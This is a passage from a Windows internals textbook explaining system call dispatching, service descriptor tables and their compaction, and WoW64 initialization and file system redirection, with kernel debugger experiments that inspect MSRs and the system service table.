up some processor state. Namely, RSP is restored to the Rsp field that was
saved on the manufactured hardware trap frame from the entry code we
analyzed, similar to all the other saved registers. RCX register is loaded from
the saved Rip, R11 is loaded from EFlags, and the swapgs instruction is used
right before issuing the sysret instruction. Because DS, ES, and FS were
never touched, they maintain their original user-space values. Finally, EDX
and XMM0 through XMM5 are zeroed out, and all other nonvolatile registers
are restored from the trap frame before the sysret instruction. Equivalent
actions are taken on for sysexit and ARM64’s exit instruction (eret).
Additionally, if CET is enabled, just like in the entry path, the shadow stack
must correctly be synchronized on the exit path.
EXPERIMENT: Locating the system service
dispatcher
As mentioned, x64 system calls occur based on a series of MSRs,
which you can use the rdmsr debugger command to explore. First,
take note of STAR, which shows KGDT_R0_CODE (0x0010) and
KGDT64_R3_DATA (0x0023).
Click here to view code image
lkd> rdmsr c0000081
msr[c0000081] = 00230010`00000000
Next, you can investigate LSTAR, and then use the ln command
to see if it’s pointing to KiSystemCall64 (for systems that don’t
require KVA Shadowing) or KiSystemCall64Shadow (for those
that do):
Click here to view code image
lkd> rdmsr c0000082
msr[c0000082] = fffff804`7ebd3740
lkd> ln fffff804`7ebd3740
(fffff804`7ebd3740) nt!KiSystemCall64
Finally, you can look at SFMASK, which should have the values
we described earlier:
Click here to view code image
lkd> rdmsr c0000084
msr[c0000084] = 00000000`00004700
x86 system calls occur through sysenter, which uses a different
set of MSRs, including 0x176, which stores the 32-bit system call
handler:
Click here to view code image
lkd> rdmsr 176
msr[176] = 00000000’8208c9c0
lkd> ln 00000000’8208c9c0
(8208c9c0) nt!KiFastCallEntry
Finally, on both x86 systems as well as x64 systems without
MBEC but with HVCI, you can see the int 0x2e handler registered
in the IDT with the !idt 2e debugger command:
Click here to view code image
lkd> !idt 2e
Dumping IDT: fffff8047af03000
2e: fffff8047ebd3040 nt!KiSystemService
You can disassemble the KiSystemService or KiSystemCall64
routine with the u command. For the interrupt handler, you’ll
eventually notice
Click here to view code image
nt!KiSystemService+0x227:
fffff804`7ebd3267 4883c408 add rsp,8
fffff804`7ebd326b 0faee8 lfence
fffff804`7ebd326e 65c604255308000000 mov byte ptr gs:
[853h],0
fffff804`7ebd3277 e904070000 jmp
nt!KiSystemServiceUser (fffff804`7ebd3980)
while the MSR handler will fall in
Click here to view code image
nt!KiSystemCall64+0x227:
fffff804`7ebd3970 4883c408 add rsp,8
fffff804`7ebd3974 0faee8 lfence
fffff804`7ebd3977 65c604255308000000 mov byte ptr gs:
[853h],0
nt!KiSystemServiceUser:
fffff804`7ebd3980 c645ab02 mov byte ptr [rbp-
55h],2
This shows you that eventually both code paths arrive in
KiSystemServiceUser, which then does most common actions
across all processors, as discussed in the next section.
Nonarchitectural system service dispatching
As Figure 8-25 illustrates, the kernel uses the system call number to locate
the system service information in the system service dispatch table. On x86
systems, this table is like the interrupt dispatch table described earlier in the
chapter except that each entry contains a pointer to a system service rather
than to an interrupt-handling routine. On other platforms, including 32-bit
ARM and ARM64, the table is implemented slightly differently; instead of
containing pointers to the system service, it contains offsets relative to the
table itself. This addressing mechanism is more suited to the x64 and ARM64
application binary interface (ABI) and instruction-encoding format, and the
RISC nature of ARM processors in general.
Note
System service numbers frequently change between OS releases. Not only
does Microsoft occasionally add or remove system services, but the table
is also often randomized and shuffled to break attacks that hardcode
system call numbers to avoid detection.
Regardless of architecture, the system service dispatcher performs a few
common actions on all platforms:
■ Save additional registers in the trap frame, such as debug registers or
floating-point registers.
■ If this thread belongs to a pico process, forward to the system call
pico provider routine (see Chapter 3, Part 1, for more information on
pico providers).
■ If this thread is an UMS scheduled thread, call KiUmsCallEntry to
synchronize with the primary (see Chapter 1, Part 1, for an
introduction on UMS). For UMS primary threads, set the
UmsPerformingSyscall flag in the thread object.
■ Save the first parameter of the system call in the FirstArgument field
of the thread object and the system call number in SystemCallNumber.
■ Call the shared user/kernel system call handler
(KiSystemServiceStart), which sets the TrapFrame field of the thread
object to the current stack pointer where it is stored.
■ Enable interrupt delivery.
At this point, the thread is officially undergoing a system call, and its state
is fully consistent and can be interrupted. The next step is to select the correct
system call table and potentially upgrade the thread to a GUI thread, details
of which will be based on the GuiThread and RestrictedGuiThread fields of
the thread object, and which will be described in the next section. Following
that, GDI Batching operations will occur for GUI threads, as long as the
TEB’s GdiBatchCount field is non-zero.
Next, the system call dispatcher must copy any of the caller’s arguments
that are not passed by register (which depends on the CPU architecture) from
the thread’s user-mode stack to its kernel-mode stack. This is needed to avoid
having each system call manually copy the arguments (which would require
assembly code and exception handling) and ensure that the user can’t change
the arguments as the kernel is accessing them. This operation is done within a
special code block that is recognized by the exception handlers as being
associated to user stack copying, ensuring that the kernel does not crash in
the case that an attacker, or incorrectly written program, is messing with the
user stack. Since system calls can take an arbitrary number of arguments
(well, almost), you see in the next section how the kernel knows how many
to copy.
Note that this argument copying is shallow: If any of the arguments passed
to a system service points to a buffer in user space, it must be probed for safe
accessibility before kernel-mode code can read and/or write from it. If the
buffer will be accessed multiple times, it may also need to be captured, or
copied, into a local kernel buffer. The responsibility of this probe and
capture operation lies with each individual system call and is not performed
by the handler. However, one of the key operations that the system call
dispatcher must perform is to set the previous mode of the thread. This value
corresponds to either KernelMode or UserMode and must be synchronized
whenever the current thread executes a trap, identifying the privilege level of
the incoming exception, trap, or system call. This will allow the system call,
using ExGetPreviousMode, to correctly handle user versus kernel callers.
Finally, two last steps are taken as part of the dispatcher’s body. First, if
DTrace is configured and system call tracing is enabled, the appropriate
entry/exit callbacks are called around the system call. Alternatively, if ETW
tracing is enabled but not DTrace, the appropriate ETW events are logged
around the system call. Finally, if neither DTrace nor ETW are enabled, the
system call is made without any additional logic. The second, and final, step,
is to increment the KeSystemCalls variable in the PRCB, which is exposed as
a performance counter that you can track in the Performance & Reliability
Monitor.
At this point, system call dispatching is complete, and the opposite steps
will then be taken as part of system call exit. These steps will restore and
copy user-mode state as appropriate, handle user-mode APC delivery as
needed, address side-channel mitigations around various architectural
buffers, and eventually return with one of the CPU instructions relevant for
this platform.
Kernel-issued system call dispatching
Because system calls can be performed both by user-mode code and kernel
mode, any pointers, handles, and behaviors should be treated as if coming
from user mode—which is clearly not correct.
To solve this, the kernel exports specialized Zw versions of these calls—
that is, instead of NtCreateFile, the kernel exports ZwCreateFile.
Additionally, because Zw functions must be manually exported by the kernel,
only the ones that Microsoft wishes to expose for third-party use are present.
For example, ZwCreateUserProcess is not exported by name because kernel
drivers are not expected to launch user applications. These exported APIs are
not actually simple aliases or wrappers around the Nt versions. Instead, they
are “trampolines” to the appropriate Nt system call, which use the same
system call-dispatching mechanism.
Like KiSystemCall64 does, they too build a fake hardware trap frame
(pushing on the stack the data that the CPU would generate after an interrupt
coming from kernel mode), and they also disable interrupts, just like a trap
would. On x64 systems, for example, the KGDT64_R0_CODE (0x0010)
selector is pushed as CS, and the current kernel stack as RSP. Each of the
trampolines places the system call number in the appropriate register (for
example, EAX on x86 and x64), and then calls KiServiceInternal, which
saves additional data in the trap frame, reads the current previous mode,
stores it in the trap frame, and then sets the previous mode to KernelMode
(this is an important difference).
User-issued system call dispatching
As was already introduced in Chapter 1 of Part 1, the system service dispatch
instructions for Windows executive services exist in the system library
Ntdll.dll. Subsystem DLLs call functions in Ntdll to implement their
documented functions. The exception is Windows USER and GDI functions,
including DirectX Kernel Graphics, for which the system service dispatch
instructions are implemented in Win32u.dll. Ntdll.dll is not involved. These
two cases are shown in Figure 8-26.
Figure 8-26 System service dispatching.
As shown in the figure, the Windows WriteFile function in Kernel32.dll
imports and calls the WriteFile function in API-MS-Win-Core-File-L1-1-
0.dll, one of the MinWin redirection DLLs (see Chapter 3, Part 1, for more
information on API redirection), which in turn calls the WriteFile function in
KernelBase.dll, where the actual implementation lies. After some subsystem-
specific parameter checks, it then calls the NtWriteFile function in Ntdll.dll,
which in turn executes the appropriate instruction to cause a system service
trap, passing the system service number representing NtWriteFile.
The system service dispatcher in Ntoskrnl.exe (in this example,
KiSystemService) then calls the real NtWriteFile to process the I/O request.
For Windows USER, GDI, and DirectX Kernel Graphics functions, the
system service dispatch calls the function in the loadable kernel-mode part of
the Windows subsystem, Win32k.sys, which might then filter the system call
or forward it to the appropriate module, either Win32kbase.sys or
Win32kfull.sys on Desktop systems, Win32kmin.sys on Windows 10X
systems, or Dxgkrnl.sys if this was a DirectX call.
System call security
Since the kernel has the mechanisms that it needs for correctly synchronizing
the previous mode for system call operations, each system call service can
rely on this value as part of processing. We previously mentioned that these
functions must first probe any argument that’s a pointer to a user-mode
buffer of any sort. By probe, we mean the following:
1.
Making sure that the address is below MmUserProbeAddress, which
is 64 KB below the highest user-mode address (such as 0x7FFF0000
on 32-bit).
2.
Making sure that the address is aligned to a boundary matching how
the caller intends to access its data—for example, 2 bytes for Unicode
characters, 8 bytes for a 64-bit pointer, and so on.
3.
If the buffer is meant to be used for output, making sure that, at the
time the system call begins, it is actually writable.
Note that output buffers could become invalid or read-only at any future
point in time, and the system call must always access them using SEH, which
we described earlier in this chapter, to avoid crashing the kernel. For a
similar reason, although input buffers aren’t checked for readability, because
they will likely be imminently used anyway, SEH must be used to ensure
they can be safely read. SEH doesn’t protect against alignment mismatches
or wild kernel pointers, though, so the first two steps must still be taken.
It’s obvious that the first check described above would fail for any kernel-
mode caller right away, and this is the first part where previous mode comes
in—probing is skipped for non-UserMode calls, and all buffers are assumed
to be valid, readable and/or writeable as needed. This isn’t the only type of
validation that a system call must perform, however, because some other
dangerous situations can arise:
■ The caller may have supplied a handle to an object. The kernel
normally bypasses all security access checks when referencing
objects, and it also has full access to kernel handles (which we
describe later in the “Object Manager” section of this chapter),
whereas user-mode code does not. The previous mode is used to
inform the Object Manager that it should still perform access checks
because the request came from user space.
■ In even more complex cases, it’s possible that flags such as
OBJ_FORCE_ACCESS_CHECK need to be used by a driver to
indicate that even though it is using the Zw API, which sets the
previous mode to KernelMode, the Object Manager should still treat
the request as if coming from UserMode.
■ Similarly, the caller may have specified a file name. It’s important for
the system call, when opening the file, to potentially use the
IO_FORCE_ACCESS_CHECKING flag, to force the security
reference monitor to validate access to the file system, as otherwise a
call such as ZwCreateFile would change the previous mode to
KernelMode and bypass access checks. Potentially, a driver may also
have to do this if it’s creating a file on behalf of an IRP from user-
space.
■ File system access also brings risks with regard to symbolic links and
other types of redirection attacks, where privileged kernel-mode code
might be incorrectly using various process-specific/user-accessible
reparse points.
■ Finally, and in general, any operation that results in a chained system
call, which is performed with the Zw interface, must keep in mind that
this will reset the previous mode to KernelMode and respond
accordingly.
Service descriptor tables
We previously mentioned that before performing a system call, the user-
mode or kernel-mode trampolines will first place a system call number in a
processor register such as RAX, R12, or X8. This number is technically
composed of two elements, which are shown in Figure 8-27. The first
element, stored in the bottom 12 bits, represents the system call index. The
second, which uses the next higher 2 bits (12-13), is the table identifier. As
you’re about to see, this allows the kernel to implement up to four different
types of system services, each stored in a table that can house up to 4096
system calls.
Figure 8-27 System service number to system service translation.
The kernel keeps track of the system service tables using three possible
arrays—KeServiceDescriptorTable, KeServiceDescriptorTableShadow, and
KeServiceDescriptorTableFilter. Each of these arrays can have up to two
entries, which store the following three pieces of data:
■ A pointer to the array of system calls implemented by this service
table
■ The number of system calls present in this service table, called the
limit
■ A pointer to the array of argument bytes for each of the system calls
in this service table
The first array only ever has one entry, which points to KiServiceTable and
KiArgumentTable, with a little over 450 system calls (the precise number
depends on your version of Windows). All threads, by default, issue system
calls that only access this table. On x86, this is enforced by the ServiceTable
pointer in the thread object, while all other platforms hardcode the symbol
KeServiceDescriptorTable in the system call dispatcher.
The first time that a thread makes a system call that’s beyond the limit, the
kernel calls PsConvertToGuiThread, which notifies the USER and GDI
services in Win32k.sys about the thread and sets either the thread object’s
GuiThread flag or its RestrictedGuiThread flag after these return
successfully. Which one is used depends on whether the
EnableFilteredWin32kSystemCalls process mitigation option is enabled,
which we described in the “Process-mitigation policies” section of Chapter 7,
Part 1. On x86 systems, the thread object’s ServiceTable pointer now
changes to KeServiceDescriptorTableShadow or
KeServiceDescriptorTableFilter depending on which of the flags is set, while
on other platforms it is a hardcoded symbol chosen at each system call.
(Although less performant, the latter avoids an obvious hooking point for
malicious software to abuse.)
As you can probably guess, these other arrays include a second entry,
which represents the Windows USER and GDI services implemented in the
kernel-mode part of the Windows subsystem, Win32k.sys, and, more
recently, the DirectX Kernel Subsystem services implemented by
Dxgkrnl.sys, albeit these still transit through Win32k.sys initially. This
second entry points to W32pServiceTable or W32pServiceTableFilter and
W32pArgumentTable or W32pArgumentTableFilter, respectively, and has
about 1250 system calls or more, depending on your version of Windows.
Note
Because the kernel does not link against Win32k.sys, it exports a
KeAddSystemServiceTable function that allows the addition of an
additional entry into the KeServiceDescriptorTableShadow and the
KeServiceDescriptorTableFilter table if it has not already been filled out.
If Win32k.sys has already called these APIs, the function fails, and
PatchGuard protects the arrays once this function has been called, so that
the structures effectively become read only.
The only material difference between the Filter entries is that they point to
system calls in Win32k.sys with names like stub_UserGetThreadState, while
the real array points to NtUserGetThreadState. The former stubs will check if
Win32k.sys filtering is enabled for this system call, based, in part, on the
filter set that’s been loaded for the process. Based on this determination, they
will either fail the call and return STATUS_INVALID_SYSTEM_SERVICE if
the filter set prohibits it or end up calling the original function (such as
NtUserGetThreadState), with potential telemetry if auditing is enabled.
The argument tables, on the other hand, are what help the kernel to know
how many stack bytes need to be copied from the user stack into the kernel
stack, as explained in the dispatching section earlier. Each entry in the
argument table corresponds to the matching system call with that index and
stores the count of bytes to copy (up to 255). However, kernels for platforms
other than x86 employ a mechanism called system call table compaction,
which combines the system call pointer from the call table with the byte
count from the argument table into a single value. The feature works as
follows:
1.
Take the system call function pointer and compute the 32-bit
difference from the beginning of the system call table itself. Because
the tables are global variables inside of the same module that contains
the functions, this range of ±2 GB should be more than enough.
2.
Take the stack byte count from the argument table and divide it by 4,
converting it into an argument count (some functions might take 8-
byte arguments, but for these purposes, they’ll simply be considered
as two “arguments”).
3.
Shift the 32-bit difference from the first step by 4 bits to the left,
effectively making it a 28-bit difference (again, this is fine—no kernel
component is more than 256 MB) and perform a bitwise or operation
to add the argument count from the second step.
4.
Override the system call function pointer with the value obtained in
step 3.
This optimization, although it may look silly at first, has a number of
advantages: It reduces cache usage by not requiring two distinct arrays to be
looked up during a system call, it simplifies the amount of pointer
dereferences, and it acts as a layer of obfuscation, which makes it harder to
hook or patch the system call table while making it easier for PatchGuard to
defend it.
EXPERIMENT: Mapping system call numbers to
functions and arguments
You can duplicate the same lookup performed by the kernel when
dealing with a system call ID to figure out which function is
responsible for handling it and how many arguments it takes. On an
x86 system, you can just ask the debugger to dump each system
call table, such as KiServiceTable with the dps command, which
stands for dump pointer symbol, which will actually perform a
lookup for you. You can then similarly dump the KiArgumentTable
(or any of the Win32k.sys ones) with the db command or dump
bytes.
A more interesting exercise, however, is dumping this data on an
ARM64 or x64 system, due to the encoding we described earlier.
The following steps will help you do that.
1.
You can dump a specific system call by undoing the
compaction steps described earlier. Take the base of the
table and add it to the 28-bit offset that’s stored at the
desired index, as shown here, where system call 3 in the
kernel’s service table is revealed to be
NtMapUserPhysicalPagesScatter:
Click here to view code image
lkd> ?? ((ULONG)(nt!KiServiceTable[3]) >> 4) +
(int64)nt!KiServiceTable
unsigned int64 0xfffff803`1213e030
lkd> ln 0xfffff803`1213e030
(fffff803`1213e030) nt!NtMapUserPhysicalPagesScatter
2.
You can see the number of stack-based 4-byte arguments
this system call takes by taking the 4-bit argument count:
Click here to view code image
lkd> dx (((int*)&(nt!KiServiceTable))[3] & 0xF)
(((int*)&(nt!KiServiceTable))[3] & 0xF) : 0
3.
Note that this doesn’t mean the system call has no
arguments. Because this is an x64 system, the call could
take anywhere between 0 and 4 arguments, all of which are
in registers (RCX, RDX, R8, and R9).
4.
You could also use the debugger data model to create a
LINQ predicate using projection, dumping the entire table,
leveraging the fact that the KiServiceLimit variable
corresponds to the same limit field in the service descriptor
table (just like W32pServiceLimit for the Win32k.sys entries
in the shadow descriptor table). The output would look like
this:
Click here to view code image
lkd> dx @$table = &nt!KiServiceTable
@$table = &nt!KiServiceTable : 0xfffff8047ee24800
[Type: void *]
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))-
>Take(*(int*)&nt!KiServiceLimit)->
Select(x => (x >> 4) + @$table)
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*
(int*)&nt!KiServiceLimit)->Select
(x => (x >> 4) + @$table)
[0] : 0xfffff8047eb081d0 [Type: void
*]
[1] : 0xfffff8047eb10940 [Type: void
*]
[2] : 0xfffff8047f0b7800 [Type: void
*]
[3] : 0xfffff8047f299f50 [Type: void
*]
[4] : 0xfffff8047f012450 [Type: void
*]
[5] : 0xfffff8047ebc5cc0 [Type: void
*]
[6] : 0xfffff8047f003b20 [Type: void
*]
5.
You could use a more complex version of this command
that would also allow you to convert the pointers into their
symbolic forms, essentially reimplementing the dps
command that works on x86 Windows:
Click here to view code image
lkd> dx @$symPrint = (x =>
Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\","
+
((unsigned __int64)x).ToDisplayString("x")).First())
@$symPrint = (x =>
Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\","
+
((unsigned __int64)x).ToDisplayString("x")).First())
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*
(int*)&nt!KiServiceLimit)->Select
(x => @$symPrint((x >> 4) + @$table))
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*
(int*)&nt!KiServiceLimit)->Select(x => @$symPrint((x >> 4) +
@$table))
[0] : nt!NtAccessCheck (fffff804`7eb081d0)
[1] : nt!NtWorkerFactoryWorkerReady
(fffff804`7eb10940)
[2] : nt!NtAcceptConnectPort
(fffff804`7f0b7800)
[3] : nt!NtMapUserPhysicalPagesScatter
(fffff804`7f299f50)
[4] : nt!NtWaitForSingleObject
(fffff804`7f012450)
[5] : nt!NtCallbackReturn
(fffff804`7ebc5cc0)
6.
Finally, as long as you’re only interested in the kernel’s
service table and not the Win32k.sys entries, you can also
use the !chksvctbl -v command in the debugger, whose
output will include all of this data while also checking for
inline hooks that a rootkit may have attached:
Click here to view code image
lkd> !chksvctbl -v
# ServiceTableEntry DecodedEntryTarget(Address)
CompactedOffset
============================================================
==============================
0 0xfffff8047ee24800
nt!NtAccessCheck(0xfffff8047eb081d0) 0n-52191996
1 0xfffff8047ee24804
nt!NtWorkerFactoryWorkerReady(0xfffff8047eb10940) 0n-
51637248
2 0xfffff8047ee24808
nt!NtAcceptConnectPort(0xfffff8047f0b7800) 0n43188226
3 0xfffff8047ee2480c
nt!NtMapUserPhysicalPagesScatter(0xfffff8047f299f50)
0n74806528
4 0xfffff8047ee24810
nt!NtWaitForSingleObject(0xfffff8047f012450) 0n32359680
EXPERIMENT: Viewing system service activity
You can monitor system service activity by watching the System
Calls/Sec performance counter in the System object. Run the
Performance Monitor, click Performance Monitor under
Monitoring Tools, and click the Add button to add a counter to the
chart. Select the System object, select the System Calls/Sec
counter, and then click the Add button to add the counter to the
chart.
You’ll probably want to change the maximum to a much higher
value, as it’s normal for a system to have hundreds of thousands of
system calls a second, especially the more processors the system
has. The figure below shows what this data looked like on the
author’s computer.
WoW64 (Windows-on-Windows)
WoW64 (Win32 emulation on 64-bit Windows) refers to the software that
permits the execution of 32-bit applications on 64-bit platforms (which can
also belong to a different architecture). WoW64 was originally a research
project for running x86 code in old alpha and MIPS version of Windows NT
3.51. It has drastically evolved since then (that was around the year 1995).
When Microsoft released Windows XP 64-bit edition in 2001, WoW64 was
included in the OS for running old x86 32-bit applications in the new 64-bit
OS. In modern Windows releases, WoW64 has been expanded to support
also running ARM32 applications and x86 applications on ARM64 systems.
WoW64 core is implemented as a set of user-mode DLLs, with some
support from the kernel for creating the target’s architecture versions of what
would normally only be 64-bit native data structures, such as the process
environment block (PEB) and thread environment block (TEB). Changing
WoW64 contexts through Get/SetThreadContext is also implemented by the
kernel. Here are the core user-mode DLLs responsible for WoW64:
■ Wow64.dll Implements the WoW64 core in user mode. Creates the
thin software layer that acts as a kind of intermediary kernel for 32-bit
applications and starts the simulation. Handles CPU context state
changes and base system calls exported by Ntoskrnl.exe. It also
implements file-system redirection and registry redirection.
■ Wow64win.dll Implements thunking (conversion) for GUI system
calls exported by Win32k.sys. Both Wow64win.dll and Wow64.dll
include thunking code, which converts a calling convention from an
architecture to another one.
Some other modules are architecture-specific and are used for translating
machine code that belongs to a different architecture. In some cases (like for
ARM64) the machine code needs to be emulated or jitted. In this book, we
use the term jitting to refer to the just-in-time compilation technique that
involves compilation of small code blocks (called compilation units) at
runtime instead of emulating and executing one instruction at a time.
Here are the DLLs that are responsible in translating, emulating, or jitting
the machine code, allowing it to be run by the target operating system:
■ Wow64cpu.dll Implements the CPU simulator for running x86 32-bit
code in AMD64 operating systems. Manages the 32-bit CPU context
of each running thread inside WoW64 and provides processor
architecture-specific support for switching CPU mode from 32-bit to
64-bit and vice versa.
■ Wowarmhw.dll Implements the CPU simulator for running ARM32
(AArch32) applications on ARM64 systems. It represents the ARM64
equivalent of the Wow64cpu.dll used in x86 systems.
■ Xtajit.dll Implements the CPU emulator for running x86 32-bit
applications on ARM64 systems. Includes a full x86 emulator, a jitter
(code compiler), and the communication protocol between the jitter
and the XTA cache server. The jitter can create compilation blocks
including ARM64 code translated from the x86 image. Those blocks
are stored in a local cache.
The relationship of the WoW64 user-mode libraries (together with other
core WoW64 components) is shown in Figure 8-28.
Figure 8-28 The WoW64 architecture.
Note
Older Windows versions designed to run in Itanium machines included a
full x86 emulator integrated in the WoW64 layer called Wowia32x.dll.
Itanium processors were not able to natively execute x86 32-bit
instructions in an efficient manner, so an emulator was needed. The
Itanium architecture was officially discontinued in January 2019.
A newer Insider release version of Windows also supports executing 64-
bit x86 code on ARM64 systems. A new jitter has been designed for that
reason. However emulating AMD64 code in ARM systems is not
performed through WoW64. Describing the architecture of the AMD64
emulator is outside the scope of this release of this book.
The WoW64 core
As introduced in the previous section, the WoW64 core is platform
independent: It creates a software layer for managing the execution of 32-bit
code in 64-bit operating systems. The actual translation is performed by
another component called Simulator (also known as Binary Translator),
which is platform specific. In this section, we will discuss the role of the
WoW64 core and how it interoperates with the Simulator. While the core of
WoW64 is almost entirely implemented in user mode (in the Wow64.dll
library), small parts of it reside in the NT kernel.
WoW64 core in the NT kernel
During system startup (phase 1), the I/O manager invokes the
PsLocateSystemDlls routine, which maps all the system DLLs supported by
the system (and stores their base addresses in a global array) in the System
process user address space. This also includes WoW64 versions of Ntdll, as
described by Table 8-13. Phase 2 of the process manager (PS) startup
resolves some entry points of those DLLs, which are stored in internal kernel
variables. One of the exports, LdrSystemDllInitBlock, is used to transfer
WoW64 information and function pointers to new WoW64 processes.
Table 8-13 Different Ntdll version list
Path
Inte
rnal
Na
me
Description
c:\windows
\system32\
ntdll.dll
ntdll
.dll
The system Ntdll mapped in every user process
(except for minimal processes). This is the only
version marked as required.
c:\windows
\SysWow6
4\ntdll.dll
ntdll
32.d
ll
32-bit x86 Ntdll mapped in WoW64 processes
running in 64-bit x86 host systems.
c:\windows
\SysArm32
\ntdll.dll
ntdll
32.d
ll
32-bit ARM Ntdll mapped in WoW64 processes
running in 64-bit ARM host systems.
c:\windows
\SyChpe32\
ntdll.dll
ntdll
wow
.dll
32-bit x86 CHPE Ntdll mapped in WoW64
processes running in 64-bit ARM host systems.
When a process is initially created, the kernel determines whether it would
run under WoW64 using an algorithm that analyzes the main process
executable PE image and checks whether the correct Ntdll version is mapped
in the system. In case the system has determined that the process is WoW64,
when the kernel initializes its address space, it maps both the native Ntdll and
the correct WoW64 version. As explained in Chapter 3 of Part 1, each
nonminimal process has a PEB data structure that is accessible from user
mode. For WoW64 processes, the kernel also allocates the 32-bit version of
the PEB and stores a pointer to it in a small data structure
(EWoW64PROCESS) linked to the main EPROCESS representing the new
process. The kernel then fills the data structure described by the 32-bit
version of the LdrSystemDllInitBlock symbol, including pointers of Wow64
Ntdll exports.
When a thread is allocated for the process, the kernel goes through a
similar process: along with the thread initial user stack (its initial size is
specified in the PE header of the main image), another stack is allocated for
executing 32-bit code. The new stack is called the thread’s WoW64 stack.
When the thread’s TEB is built, the kernel will allocate enough memory to
store both the 64-bit TEB, followed by a 32-bit TEB.
Furthermore, a small data structure (called WoW64 CPU Area
Information) is allocated at the base of the 64-bit stack. The latter is
composed of the target images machine identifier, a platform-dependent 32-
bit CPU context (X86_NT5_CONTEXT or ARM_CONTEXT data structures,
depending on the target architecture), and a pointer of the per-thread WoW64
CPU shared data, which can be used by the Simulator. A pointer to this small
data structure is stored also in the thread’s TLS slot 1 for fast referencing by
the binary translator. Figure 8-29 shows the final configuration of a WoW64
process that contains an initial single thread.
Figure 8-29 Internal configuration of a WoW64 process with only a single
thread.
User-mode WoW64 core
Aside from the differences described in the previous section, the birth of the
process and its initial thread happen in the same way as for non-WoW64
processes, until the main thread starts its execution by invoking the loader
initialization function, LdrpInitialize, in the native version of Ntdll. When the
loader detects that the thread is the first to be executed in the context of the
new process, it invokes the process initialization routine,
LdrpInitializeProcess, which, along with a lot of different things (see the
“Early process initialization” section of Chapter 3 in Part 1 for further
details), determines whether the process is a WoW64 one, based on the
presence of the 32-bit TEB (located after the native TEB and linked to it). In
case the check succeeded, the native Ntdll sets the internal UseWoW64 global
variable to 1, builds the path of the WoW64 core library, wow64.dll, and
maps it above the 4 GB virtual address space limit (in that way it can’t
interfere with the simulated 32-bit address space of the process.) It then gets
the address of some WoW64 functions that deal with process/thread
suspension and APC and exception dispatching and stores them in some of its
internal variables.
When the process initialization routine ends, the Windows loader transfers
the execution to the WoW64 Core via the exported Wow64LdrpInitialize
routine, which will never return. From now on, each new thread starts
through that entry point (instead of the classical RtlUserThreadStart). The
WoW64 core obtains a pointer to the CPU WoW64 area stored by the kernel
at the TLS slot 1. In case the thread is the first of the process, it invokes the
WoW64 process initialization routine, which performs the following steps:
1.
Tries to load the WoW64 Thunk Logging DLL (wow64log.dll). The
Dll is used for logging WoW64 calls and is not included in
commercial Windows releases, so it is simply skipped.
2.
Looks up the Ntdll32 base address and function pointers thanks to the
LdrSystemDllInitBlock filled by the NT kernel.
3.
Initializes the files system and registry redirection. File system and
registry redirection are implemented in the Syscall layer of WoW64
core, which intercepts 32-bit registry and files system requests and
translates their path before invoking the native system calls.
4.
Initializes the WoW64 service tables, which contains pointers to
system services belonging to the NT kernel and Win32k GUI
subsystem (similar to the standard kernel system services), but also
Console and NLS service call (both WoW64 system service calls and
redirection are covered later in this chapter.)
5.
Fills the 32-bit version of the process’s PEB allocated by the NT
kernel and loads the correct CPU simulator, based on the process
main image’s architecture. The system queries the “default” registry
value of the HKLM\SOFTWARE\Microsoft\Wow64\<arch> key
(where <arch> can be x86 or arm, depending on the target
architecture), which contains the simulator’s main DLL name. The
simulator is then loaded and mapped in the process’s address space.
Some of its exported functions are resolved and stored in an internal
array called BtFuncs. The array is the key that links the platform-
specific binary translator to the WoW64 subsystem: WoW64 invokes
simulator’s functions only through it. The BtCpuProcessInit function,
for example, represents the simulator’s process initialization routine.
6.
The thunking cross-process mechanism is initialized by allocating and
mapping a 16 KB shared section. A synthesized work item is posted
on the section when a WoW64 process calls an API targeting another
32-bit process (this operation propagates thunk operations across
different processes).
7.
The WoW64 layer informs the simulator (by invoking the exported
BtCpuNotifyMapViewOfSection) that the main module, and the 32-bit
version of Ntdll have been mapped in the address space.
8.
Finally, the WoW64 core stores a pointer to the 32-bit system call
dispatcher into the Wow64Transition exported variable of the 32-bit
version of Ntdll. This allows the system call dispatcher to work.
When the process initialization routine ends, the thread is ready to start the
CPU simulation. It invokes the Simulator’s thread initialization function and
prepares the new 32-bit context, translating the 64-bit one initially filled by
the NT kernel. Finally, based on the new context, it prepares the 32-bit stack
for executing the 32-bit version of the LdrInitializeThunk function. The
simulation is started via the simulator’s BTCpuSimulate exported function,
which will never return to the caller (unless a critical error in the simulator
happens).
File system redirection
To maintain application compatibility and to reduce the effort of porting
applications from Win32 to 64-bit Windows, system directory names were
kept the same. Therefore, the \Windows\System32 folder contains native 64-
bit images. WoW64, as it intercepts all the system calls, translates all the path
related APIs and replaces various system paths with the WoW64 equivalent
(which depends on the target process’s architecture), as listed in Table 8-14.
The table also shows paths redirected through the use of system environment
variables. (For example, the %PROGRAMFILES% variable is also set to
\Program Files (x86) for 32-bit applications, whereas it is set to the \Program
Files folder for 64-bit applications.)
Table 8-14 WoW64 redirected paths
Path
Archi
tectur
e
Redirected Location
c:\windows\sy
stem32
X86
on
AMD
64
C:\Windows\SysWow64
X86
on
ARM
64
C:\Windows\SyChpe32 (or
C:\Windows\SysWow64 if the target file
does not exist in SyChpe32)
ARM
32
C:\Windows\SysArm32
%ProgramFile
s%
Nativ
e
C:\Program Files
X86
C:\Program Files (x86)
ARM
32
C:\Program Files (Arm)
%CommonPro
gramFiles%
Nativ
e
C:\Program Files\Common Files
X86
C:\Program Files (x86)
ARM
32
C:\Program Files (Arm)\Common Files
C:\Windows\r
egedit.exe
X86
C:\Windows\SysWow64\regedit.exe
ARM
32
C:\Windows\SysArm32\regedit.exe
C:\Windows\L
astGood\Syste
m32
X86
C:\Windows\LastGood\SysWow64
ARM
32
C:\Windows\LastGood\SysArm32
There are a few subdirectories of \Windows\System32 that, for
compatibility and security reasons, are exempted from being redirected such
that access attempts to them made by 32-bit applications actually access the
real one. These directories include the following:
■ %windir%\system32\catroot and %windir%\system32\catroot2
■ %windir%\system32\driverstore
■ %windir%\system32\drivers\etc
■ %windir%\system32\hostdriverstore
■ %windir%\system32\logfiles
■ %windir%\system32\spool
Finally, WoW64 provides a mechanism to control the file system
redirection built into WoW64 on a per-thread basis through the
Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection
functions. This mechanism works by storing an enabled/disabled value on the
TLS index 8, which is consulted by the internal WoW64 RedirectPath
